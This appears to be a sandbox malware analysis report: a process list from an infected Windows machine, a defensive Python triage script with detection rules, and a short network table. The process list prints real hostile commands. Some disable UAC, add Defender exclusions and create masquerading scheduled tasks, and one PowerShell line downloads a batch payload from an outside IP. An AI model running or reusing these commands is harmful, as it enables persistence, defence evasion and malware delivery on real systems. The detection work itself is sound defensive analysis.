C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe
"C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"
C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\crack.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"
C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe"
C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe
"C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5604 -ip 5604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 712
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9021.tmp\9022.tmp\9023.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
C:\Users\Admin\AppData\Local\Temp\Files\4434.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9E3A.tmp\9E3B.tmp\9E3C.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66F5uGiqJAOk.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd2b4a46f8,0x7ffd2b4a4708,0x7ffd2b4a4718
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:8
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y1zWGyz3dY2Y.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nji9VoGgO53z.bat" "
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
"C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1uotMJjAf1rr.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:8
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\ProgramData\javaw.exe
C:\ProgramData\javaw.exe
C:\Windows\system32\WerFaultSecure.exe
"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 3224 -i 3224 -h 416 -j 408 -s 448 -d 6092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 47024 -ip 47024
C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe
"C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 47024 -s 304
C:\Windows\system32\WerFaultSecure.exe
C:\Windows\system32\WerFaultSecure.exe -u -p 3224 -s 1228
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe > nul
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aTrKFTKtFFLY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgvYUqhnL4t.bat" "
C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S4XNjx3QJkt7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"
C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5336 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q3k6WSWS4tTa.bat" "
C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Edge.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe
"C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugCvnfQWROW5.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\djJ6SAoRVT0p.bat" "
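The process list above is long, but the lines that matter for triage are a handful of recurring patterns: a scheduled task named `RuntimeBroker` that runs at logon with `/rl HIGHEST` and points at a `RuntimeBroker.exe` sitting in a `system32\devtun\` subdirectory rather than in System32 itself, a PowerShell `Add-MpPreference -ExclusionPath` call that carves a Defender exclusion, `cmd /c ... del` lines that delete the dropper after it has run, `rundll32` loading a DLL out of `AppData\Roaming`, `RegAsm.exe` started by `Edge.exe` with no arguments, and the `chcp 65001` / `ping -n 10 localhost` pair that batch droppers use as a sleep. The script below is an added example, not part of the sandbox report and not any vendor's rule content: it runs a small set of command-line rules over lines copied from the list and tags each hit. The rule wording, the ATT&CK technique IDs, the short `SYSTEM_NAMES` list and the "user-writable path" heuristic are this example's own choices; `dwm.exe` from the same list is kept as a benign control.

```python
"""Triage pass over sandbox process command lines.

Added example, not part of the report. SAMPLE holds command lines copied
from the process list on this page (one benign line included); the rules
and the ATT&CK mapping are this example's own.
"""
import re

# Names malware borrows from Windows. A process with one of these names is
# only plausible directly in System32/SysWOW64, never in a subdirectory or
# a user-writable location. (Illustrative subset, not an exhaustive list.)
SYSTEM_NAMES = {"runtimebroker.exe", "svchost.exe", "dwm.exe", "explorer.exe",
                "lsass.exe", "csrss.exe", "conhost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

RULES = [
    ("T1053.005 scheduled task created to run at logon",
     re.compile(r"schtasks.*?/create.*?/sc\s+onlogon", re.I)),
    ("scheduled task requests /rl HIGHEST",
     re.compile(r"schtasks.*?/rl\s+highest", re.I)),
    ("T1562.001 Defender exclusion added via Add-MpPreference",
     re.compile(r"add-mppreference\s+-exclusion", re.I)),
    ("T1070.004 self-deletion via cmd /c ... del",
     re.compile(r'cmd(\.exe)?"?\s+/c\b.*\bdel\b', re.I)),
    ("T1059.003 batch script run from %TEMP%",
     re.compile(r'\\temp\\[^"]*\.bat\b', re.I)),
    ("T1218.011 rundll32 loading a DLL from the user profile",
     re.compile(r"rundll32.*\\users\\.*\.dll", re.I)),
    ("T1055 RegAsm.exe started with no arguments (common injection host)",
     re.compile(r'regasm\.exe"?\s*$', re.I)),
    ("T1497.003 ping localhost used as a sleep",
     re.compile(r"ping\s+-n\s+\d+\s+localhost", re.I)),
]


def image_path(cmdline: str) -> str:
    """Executable token at the start of a command line (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(" ", 1)[0]


def masquerades(path: str) -> bool:
    """True when the file name is a Windows system binary but the location is not."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    return name in SYSTEM_NAMES and p not in {d + name for d in SYSTEM_DIRS}


def from_user_writable(path: str) -> bool:
    p = path.lower()
    return p.endswith(".exe") and p.startswith(USER_WRITABLE)


def classify(cmdline: str) -> list[str]:
    """Findings for one command line; an empty list means nothing fired."""
    hits = [tag for tag, rx in RULES if rx.search(cmdline)]
    img = image_path(cmdline)
    if masquerades(img):
        hits.append("T1036.005 system binary name outside System32: " + img)
    elif from_user_writable(img):
        hits.append("executable started from a user-writable path: " + img)
    # The creating process (schtasks.exe) is legitimate; the task target may not be.
    m = re.search(r'/tr\s+"([^"]+)"', cmdline, re.I)
    if m and masquerades(m.group(1)):
        hits.append("T1036.005 task target masquerades as a system binary: " + m.group(1))
    return hits


def scan(cmdlines) -> dict[str, list[str]]:
    """Map each flagged command line to its findings; benign lines are dropped."""
    return {c: h for c in cmdlines if (h := classify(c))}


SAMPLE = [  # copied from the process list above; dwm.exe is the benign control
    r'C:\Windows\System32\dwm.exe',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main',
    r'"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f',
    r'"C:\Windows\system32\devtun\RuntimeBroker.exe"',
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y1zWGyz3dY2Y.bat" "',
    r'ping -n 10 localhost',
    r'"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe > nul',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
    r'"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"',
    r'powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"',
    r'C:\ProgramData\javaw.exe',
]

if __name__ == "__main__":
    for cmd, findings in scan(SAMPLE).items():
        print(cmd)
        for f in findings:
            print("    ", f)
```

The path check is deliberately exact: `C:\Windows\system32\devtun\RuntimeBroker.exe` fails it because the real binary lives one directory up, and a prefix test on `C:\Windows\system32\` would have let it through. The same check is applied to the `/tr` target of `schtasks`, since `schtasks.exe` itself is a clean signed binary and only the task body is suspicious.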
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
